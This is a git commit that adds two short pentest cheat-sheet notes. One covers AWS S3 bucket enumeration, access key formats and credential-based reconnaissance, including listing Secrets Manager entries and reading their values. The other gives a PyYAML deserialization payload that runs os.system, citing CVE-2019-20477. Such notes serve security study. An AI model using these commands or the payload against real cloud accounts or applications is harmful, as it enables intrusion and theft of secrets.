yaml deserialization, s3 buckets enum
This commit is contained in:
parent
c9f70905cf
commit
615effb8a0
|
|
@ -0,0 +1,84 @@
|
||||||
|
# AWS S3 Enumeration
|
||||||
|
|
||||||
|
## Usage
|
||||||
|
|
||||||
|
* [Regions](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/using-regions-availability-zones.html#concepts-available-segions)
|
||||||
|
* `--region`
|
||||||
|
### Simple Storage Service (S3)
|
||||||
|
* [S3](https://aws.amazon.com/s3/)
|
||||||
|
* Methods of access control are as follows
|
||||||
|
* [Bucket policies](https://docs.aws.amazon.com/AmazonS3/latest/userguide/bucket-policies.html)
|
||||||
|
* [S3 ACL](https://docs.aws.amazon.com/AmazonS3/latest/userguide/managing-acls.html)
|
||||||
|
|
||||||
|
* Scheme is
|
||||||
|
```sh
|
||||||
|
http://<bucketname>.s3.amazonaws.com/file.name
|
||||||
|
```
|
||||||
|
or
|
||||||
|
```sh
|
||||||
|
http://s3.amazonaws.com/BUCKETNAME/FILENAME.ext
|
||||||
|
```
|
||||||
|
|
||||||
|
* __List content of public bucket via__
|
||||||
|
```sh
|
||||||
|
aws s3 ls s3://<bucketname>/ --no-sign-request
|
||||||
|
```
|
||||||
|
* Download via `curl`, `wget` or `s3` cli via
|
||||||
|
```sh
|
||||||
|
aws s3 cp s3://<bucketname>/foo_public.xml . --no-sign-request
|
||||||
|
```
|
||||||
|
|
||||||
|
#### ACL
|
||||||
|
* `Anyone`, just `curl`
|
||||||
|
* `AuthenticatedUsers`, `s3` cli with aws key
|
||||||
|
|
||||||
|
## IAM
|
||||||
|
* Not necessarily used by s3
|
||||||
|
* Access key ID, starts with `AKIA` + 20 chars
|
||||||
|
* Secret access key
|
||||||
|
* Session token, `ASIA` + sessionToken
|
||||||
|
|
||||||
|
* Add credentials to profile via
|
||||||
|
```sh
|
||||||
|
aws configure --profile PROFILENAME
|
||||||
|
```
|
||||||
|
* Config and credentials is stored at `~/.aws`
|
||||||
|
* Sanity test profile via
|
||||||
|
```sh
|
||||||
|
aws s3 ls --profile PROFILENAME
|
||||||
|
```
|
||||||
|
* Find account ID to an access key
|
||||||
|
```sh
|
||||||
|
aws sts get-access-key-info --access-key-id AKIAEXAMPLE
|
||||||
|
```
|
||||||
|
* Find username to an access key
|
||||||
|
```sh
|
||||||
|
aws sts get-caller-identity --profile PROFILENAME
|
||||||
|
```
|
||||||
|
* Listing EC2 instances of an account
|
||||||
|
```sh
|
||||||
|
aws ec2 describe-instances --output text --profile PROFILENAME
|
||||||
|
```
|
||||||
|
* aws ec2 describe-instances --output text --profile PROFILENAME
|
||||||
|
```sh
|
||||||
|
aws ec2 describe-instances --output text --profile PROFILENAME
|
||||||
|
```
|
||||||
|
* In another region
|
||||||
|
```sh
|
||||||
|
aws ec2 describe-instances --output text --region us-east-1 --profile PROFILENAME
|
||||||
|
```
|
||||||
|
|
||||||
|
### AWS ARN
|
||||||
|
* Unique ID is create via the following scheme
|
||||||
|
```sh
|
||||||
|
arn:aws:<service>:<region>:<account_id>:<resource_type>/<resource_name>
|
||||||
|
```
|
||||||
|
|
||||||
|
### Secrets
|
||||||
|
|
||||||
|
```sh
|
||||||
|
aws secretsmanager help
|
||||||
|
aws secretsmanager list-secrets
|
||||||
|
ws secretsmanager get-secret-value --secret-id <Name> --region <region>
|
||||||
|
```
|
||||||
|
|
||||||
|
|
@ -0,0 +1,13 @@
|
||||||
|
# YAML Deserialization
|
||||||
|
|
||||||
|
* [CVE-2019-20477](https://packetstormsecurity.com/files/cve/CVE-2019-20477)
|
||||||
|
* RCE via Yaml execution by Python
|
||||||
|
|
||||||
|
* [jolt](https://thej0lt.com/2020/06/21/cve-2019-20477-0day-yaml-deserialization-attack-on-pyyaml-version/)
|
||||||
|
|
||||||
|
## Usage
|
||||||
|
|
||||||
|
* Example Payload insid foo.yaml gets executed via Python
|
||||||
|
```sh
|
||||||
|
!!python/object/apply:os.system ["id"]
|
||||||
|
```
|
||||||
Loading…
Reference in New Issue